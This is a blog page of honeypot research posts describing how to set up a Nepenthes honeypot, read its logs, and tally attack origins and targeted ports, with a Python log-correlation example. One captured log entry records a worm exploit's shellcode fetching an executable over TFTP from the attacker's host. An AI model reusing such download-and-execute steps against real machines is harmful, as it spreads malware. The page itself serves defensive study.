ViRobot    2009.7.25.1853/20090725    found nothing

Despite the possibility of failing to detect, it is still necessary to have antivirus; it stops a lot of threats.

5. Conclusion

With 11981 attacks on an unadvertised, ordinary personal computer in 25 days, comprising 193 binaries of 53 varieties and more than 14 major malware variants from 115 places, we hope you will judge the question “Who Cares” differently, and see that the question “Who is Hacking Me?” is very valid.

Author

“Log0” is a security researcher on honeypots, web application security and cybercrime. He writes security articles on http://onhacks.org .

===

Reference :

Nepenthes – http://nepenthes.carnivore.it/

Niels Provos, Thorsten Holz – “Virtual Honeypots: From Botnet Tracking to Intrusion Detection”

Honeypot

Who is Hacking Me?

by log0 on July 21st, 2009

(Check out the traditional Chinese and simplified Chinese versions!)

1. Who is it
2. What is a honeypot
3. Setting a honeypot
4. Retaliation
5. Honeypot logs
6. Improving further
7. Summary

===

1. Who is it

We are under attack all the time. How do we find out who it is?

This article will not reveal the answers immediately, but will guide you to a possible solution. If you are new to the concept of honeypots, this will be an interesting concept to you.

2. What is a honeypot

A honeypot is a system whose sole purpose is to be attacked; it has no production value. In its fullest form it is a normal, fully functional computer, running Windows or Linux, etc. Through the compromised machine we can monitor the attacker’s motives and actions. By logging these actions and relating them to other identifiable information such as the IP address, we hope to trace back the attacker’s identity. By definition a honeypot has no legitimate users, hence any traffic to it is considered malicious in nature. This relieves us of the effort of sieving through genuinely benign connections to look for attackers.

Honeypots generally fall into two categories, but can be a mix or of other kinds:
1. High Interaction Honeypot
2. Low Interaction Honeypot

High interaction honeypot – This kind of honeypot is a real computer and can be used as one. It is designed to be taken over by the attacker, with every action inside it logged. Because it is a real computer, the attacker can launch any sort of illegal activity and attack from it, which means innocent people can be affected. Hence Data Control must be deployed to stop this malicious traffic from leaving, for example with a Honeywall. So there is risk in high interaction honeypots. Moreover, each takes a complete physical or virtual machine, and hence is quite resource-intensive compared to low interaction honeypots. This article will not describe how to set up a high interaction honeypot.

Low interaction honeypot – This kind of honeypot is software that partially emulates a vulnerable service, just enough to fool automated programs or unskilled attackers into believing it is a real system. Because it is not a fully functional program, only reads the attacker’s data, and ends the connection once the attack vector has been collected, the danger associated with high interaction honeypots is far less. The main difference is that the vulnerability is not real, and hence the attack itself should fail.

This article will describe how to setup a low interaction honeypot ( Nepenthes ) on Linux ( Ubuntu 9.04 ). Ubuntu ( or Debian ) is chosen because it is easier to deploy on it.

3. Setting a honeypot

We will use Nepenthes as our low-interaction honeypot. The concept of Nepenthes is to emulate vulnerabilities well enough to fool automated attacks and unskilled attackers. From their attack vectors and payloads, we might be able to capture techniques and malware unseen in public. Because it only emulates the vulnerability, it only logs the connections and hence is much safer. Moreover, even if it is attacked, the emulated vulnerabilities are Windows ones, so the shellcode they attract cannot do anything to the Linux host (Nepenthes itself is still network-facing software, though, so run it with dropped privileges and keep it updated). It is also capable of capturing malware for analysis, allowing you to investigate unseen malware.

Ubuntu/Debian users may employ this command :

$ sudo apt-get install nepenthes

Or download the source code from the official website :

http://nepenthes.carnivore.it/

4. Retaliation

Start it (it binds ports below 1024, so it needs sufficient privileges):

$ nepenthes

You are good to go!

If you need more information, modify /etc/nepenthes/nepenthes.conf accordingly.

// logging
    "logattack.so",                 "log-attack.conf",              ""
    "logdownload.so",               "log-download.conf",            ""
//  "logirc.so",                    "log-irc.conf",                 ""  // needs configuration
//  "logprelude.so",                "log-prelude.conf",             ""
    "loghexdump.so"                 ""                  ""

Make sure logattack.so and logdownload.so are uncommented, as above. You may experiment with the config file further.

5. Honeypot logs

If you are lucky, you should find entries in /var/log/nepenthes.log shortly. If not, please wait patiently, and also check the external connectivity to your honeypot (router port forwarding and firewall rules in particular).

( The IP addresses have been modified to protect the IP logged. )


Socket|LUID=0x9b6b290|Start=1246711030.266579|Finish=1246711030.638501|Status=CONNECTED|Proto=TCP|Type=INCOMING|Local=192.168.1.4:135|Remote=xxx.96.245.148:61250|RX=2,1520,a87bbacd0cd1c84a5991ccc690492866|TX=3,532,dc9b4e2f264c732eb5b239b2bd3a23bd|Dumpfile=
Shellcode|LUID=0x9b6afd0|Start=1246711030.453659|Finish=1246711030.462127|Type=UNKNOWN|Emulation=SUCCESS|Handler=execute::createprocess|ISock=0x9b6b290|MD5=52e5dbe8fc84060525e965aa0c030f0c|Trigger=Generic Microsoft Windows DCOM
Download|LUID=0x9b6bcb8|Result=SUCCEEDED|Start=1246711030.461798|Finish=1246711185.861585|ISock=0x9b6b290|SSock=|MD5=5069160ffe5a229ed2ee1ddd8ca14df6|SHA512=ca50e009cad7f861759f85f8db74a684f6eee8f081bcdc255414ca898bbd7ef5c14c8a7bdd875201a51581ea484a49f4cceaf90ecef526c8bdda0d5ae94e24f5|Trigger=Download Initiated by Shell Command|URL=tftp://xxx.96.245.148/ssms.exe


This is an attack from xxx.96.245.148:61250 to my private network address 192.168.1.4:135. Reading the three lines together: the Socket line records the incoming connection; the Shellcode line (its ISock field points back to that socket’s LUID) shows the payload was recognised by the generic Microsoft Windows DCOM handler and emulated as a process launch; and the Download line shows the shell command it carried fetched ssms.exe over TFTP from the attacker’s own address. The MD5 hash of the captured binary is 5069160ffe5a229ed2ee1ddd8ca14df6, which VirusTotal identifies as Net-Worm.Win32.Kolabc.gwr.
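The correlation just done by hand, as an added Python example (not Nepenthes code and not the author's tooling): each nepenthes.log line is "Type|key=value|...", a Socket line opens a connection, and the Shellcode and Download lines that belong to it carry ISock=<that socket's LUID>. Joining on that field yields one event per attack with the remote IP and port, local port, trigger, hash and payload URL, which are the fields the "Who is Hacking Me? ~"Who Will Care" is Wrong~" report above was built from; port_histogram() produces the "most visited ports" count shown in the other log post on this page. The sample log is constructed in the format of the three lines above, with 10.x addresses in place of the sanitised ones and two extra port 445 connections added.

```python
"""Correlate Nepenthes log entries into attack events (added example)."""
from collections import Counter

# Constructed sample in nepenthes.log format (10.x addresses replace the real ones).
SAMPLE_LOG = """\
Socket|LUID=0x9b6b290|Start=1246711030.266579|Finish=1246711030.638501|Status=CONNECTED|Proto=TCP|Type=INCOMING|Local=192.168.1.4:135|Remote=10.96.245.148:61250|RX=2,1520,a87bbacd0cd1c84a5991ccc690492866|TX=3,532,dc9b4e2f264c732eb5b239b2bd3a23bd|Dumpfile=
Shellcode|LUID=0x9b6afd0|Start=1246711030.453659|Finish=1246711030.462127|Type=UNKNOWN|Emulation=SUCCESS|Handler=execute::createprocess|ISock=0x9b6b290|MD5=52e5dbe8fc84060525e965aa0c030f0c|Trigger=Generic Microsoft Windows DCOM
Download|LUID=0x9b6bcb8|Result=SUCCEEDED|Start=1246711030.461798|Finish=1246711185.861585|ISock=0x9b6b290|SSock=|MD5=5069160ffe5a229ed2ee1ddd8ca14df6|SHA512=ca50e009cad7f861759f85f8db74a684f6eee8f081bcdc255414ca898bbd7ef5c14c8a7bdd875201a51581ea484a49f4cceaf90ecef526c8bdda0d5ae94e24f5|Trigger=Download Initiated by Shell Command|URL=tftp://10.96.245.148/ssms.exe
Socket|LUID=0x9b6c100|Start=1246711200.1|Finish=1246711200.5|Status=CONNECTED|Proto=TCP|Type=INCOMING|Local=192.168.1.4:445|Remote=10.0.0.7:3041|RX=1,92,00000000000000000000000000000000|TX=1,0,00000000000000000000000000000000|Dumpfile=
Socket|LUID=0x9b6c200|Start=1246711300.1|Finish=1246711300.9|Status=CONNECTED|Proto=TCP|Type=INCOMING|Local=192.168.1.4:445|Remote=10.0.0.9:1102|RX=1,92,00000000000000000000000000000000|TX=1,0,00000000000000000000000000000000|Dumpfile=
"""


def parse_entry(line):
    """'Socket|LUID=..|Local=..' -> ('Socket', {'LUID': .., 'Local': ..})."""
    kind, _, rest = line.strip().partition("|")
    fields = {}
    for item in rest.split("|"):
        key, _, value = item.partition("=")
        fields[key] = value
    return kind, fields


def split_hostport(s):
    host, _, port = s.rpartition(":")
    return host, int(port)


def correlate(text):
    """Return events keyed by socket LUID, each with its shellcode and download parts."""
    entries = [parse_entry(l) for l in text.splitlines() if l.strip()]
    events = {}
    for kind, f in entries:                       # pass 1: every incoming socket is an event
        if kind == "Socket" and f.get("Type") == "INCOMING":
            rhost, rport = split_hostport(f["Remote"])
            _, lport = split_hostport(f["Local"])
            events[f["LUID"]] = {"remote": rhost, "remote_port": rport, "local_port": lport,
                                 "start": float(f["Start"]), "shellcode": [], "downloads": []}
    for kind, f in entries:                       # pass 2: attach by ISock, whatever the order
        ev = events.get(f.get("ISock"))
        if ev is None:
            continue                              # no ISock, or its socket is in a rotated log
        if kind == "Shellcode":
            ev["shellcode"].append({"trigger": f.get("Trigger"), "md5": f.get("MD5"),
                                    "handler": f.get("Handler")})
        elif kind == "Download":
            ev["downloads"].append({"url": f.get("URL"), "md5": f.get("MD5"),
                                    "result": f.get("Result")})
    return events


def port_histogram(events):
    """'Most visited ports': incoming connections per local port."""
    return Counter(ev["local_port"] for ev in events.values())


def summarise(events):
    """One human-readable line per event, oldest first."""
    lines = []
    for ev in sorted(events.values(), key=lambda e: e["start"]):
        trig = ", ".join(s["trigger"] for s in ev["shellcode"]) or "no shellcode recognised"
        dl = ", ".join("%s (md5 %s)" % (d["url"], d["md5"]) for d in ev["downloads"]) or "-"
        lines.append("%s:%d -> :%d  %s  download: %s"
                     % (ev["remote"], ev["remote_port"], ev["local_port"], trig, dl))
    return lines


if __name__ == "__main__":
    events = correlate(SAMPLE_LOG)
    print("\n".join(summarise(events)))
    for port, n in port_histogram(events).most_common():
        print("[%5d] : %d" % (port, n))
```

Events with no Shellcode line are the "cannot be distinguished" cases the report mentions: Nepenthes saw the connection but not enough data to name the exploit, so counting on the socket rather than the trigger is what keeps those probes in the statistics.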

6. Improving Further

We can use NMap to scan our Honeypot 192.168.1.4 .

Here is the results of NMap :

# Nmap 4.90RC1 scan initiated Sat Jul 11 01:39:09 2009 as: nmap -oN 192.168.1.4.sS.txt -v -sS 192.168.1.4
Host 192.168.1.4 is up (0.000011s latency).
Interesting ports on 192.168.1.4:
Not shown: 975 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
25/tcp    open  smtp
42/tcp    open  nameserver
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
443/tcp   open  https
445/tcp   open  microsoft-ds
465/tcp   open  smtps
993/tcp   open  imaps
995/tcp   open  pop3s
1023/tcp  open  netvenuechat
1025/tcp  open  NFS-or-IIS
2103/tcp  open  zephyr-clt
2105/tcp  open  eklogin
2107/tcp  open  unknown
3372/tcp  open  msdtc
5000/tcp  open  upnp
5901/tcp  open  vnc-1
6129/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt
10012/tcp open  unknown

Read data files from: /usr/local/share/nmap
# Nmap done at Sat Jul 11 01:39:09 2009 -- 1 IP address (1 host up) scanned in 0.17 seconds

For an averagely skilled hacker this can be very attractive, but at the same time too good to be true. It is just full of holes, like an open invitation. To improve authenticity, consider exposing only some of the ports. For instance, in /etc/nepenthes/nepenthes.conf, comment out the vulnerability modules you do not want to expose (vulnkuang2.so is commented out below):

// vulnerability modules

    "vulniis.so",                   "vuln-iis.conf",                ""
//  "vulnkuang2.so",                "vuln-kuang2.conf",             ""
    "vulnlsass.so",                 "vuln-lsass.conf",              ""

Interested individuals may add the -sV option to Nmap (send service probes to fingerprint the software and its version). You may find some interesting results!

7. Summary

We are under attack all the time, but we do not know who they are. Through honeypots, you may learn about the attackers’ motives and make a first attempt at answering “Who is Hacking Me?”. We introduced a low interaction honeypot, Nepenthes, in this article, but it is only one of the many honeypots available. Through a high interaction honeypot, you may learn even more about the attacker. Now you are no longer passive, but proactive, and can learn what is happening behind the scenes.

Author

“Log0” is a security researcher on honeypots, web application security and cybercrime. He writes security articles on http://onhacks.org .

===

Reference

Nepenthes – http://nepenthes.carnivore.it/

Niels Provos, Thorsten Holz – “Virtual Honeypots: From Botnet Tracking to Intrusion Detection”

Honeypot

Who is hacking me? ~A Glance into The Log~

by log0 on July 15th, 2009



Nepenthes has been collecting data for a few days, and I’d like to share some of the rough data now. Since it is just a single server, do not generalize it to the situation of banks’, corporates’ or other high-value servers, but this is what YOUR computer can see. Remember, I never exposed the honeypot, so ALL connections are malicious.

** Most Attacks Region **
[       Russian Federation] has 57 attacks on you.
[                   Taiwan] has 36 attacks on you.
[                   Brazil] has 32 attacks on you.
[                  Germany] has 21 attacks on you.
[            United States] has 20 attacks on you.
[                    Italy] has 16 attacks on you.
[                  Romania] has 15 attacks on you.
[           United Kingdom] has 14 attacks on you.
[       Korea, Republic of] has 13 attacks on you.
[                    India] has 11 attacks on you.
[                   Poland] has 10 attacks on you.
[              Philippines] has 10 attacks on you.
[                    Japan] has 10 attacks on you.
[                   Canada] has 9 attacks on you.
[                 Bulgaria] has 9 attacks on you.
[                  Hungary] has 8 attacks on you.
[                 Malaysia] has 8 attacks on you.
[                   France] has 6 attacks on you.
[                Argentina] has 6 attacks on you.
[                    China] has 6 attacks on you.

This is as of 12 July 2009.

Apparently, Russia seems to be the largest supplier of zombies (much like Resident Evil!), steadily in first place (I have a week of data). Next, surprisingly (to me), comes Taiwan. The next one is easy, Brazil, as the geolocation section of the Microsoft SIR volume 5 suggests. The next is Germany, which is not what I have seen in Microsoft SIR volume 5. After all, this is just too little to generalize from, but you can check it out.

Remember, IP address has no national boundaries.

** Most Visited Ports **
[  445] : 385
[  135] : 39
[  139] : 7
[   25] : 1

Port 445 and Port 135 score highest. Very likely to be :

Port 445 – MS04-011 at http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Port 135 – MS03-026, a.k.a. W32/Blaster, at http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx

I am still in the middle of making sense of all the data, but the above is something you may glimpse from the mess.

(Yes, I think I should write an English version for the previous “Who is hacking me?” post.)

(7/16/2009 Updated title, and read here for the first story.)

===

Reference:

Microsoft Security Intelligence Report volume 5
Zombie computer – Wikipedia
殭屍電腦 (Zombie computer) – Chinese Wikipedia


Honeypot, Malware

Who is hacking me?

by log0 on July 12th, 2009

English version is here.

Honeypot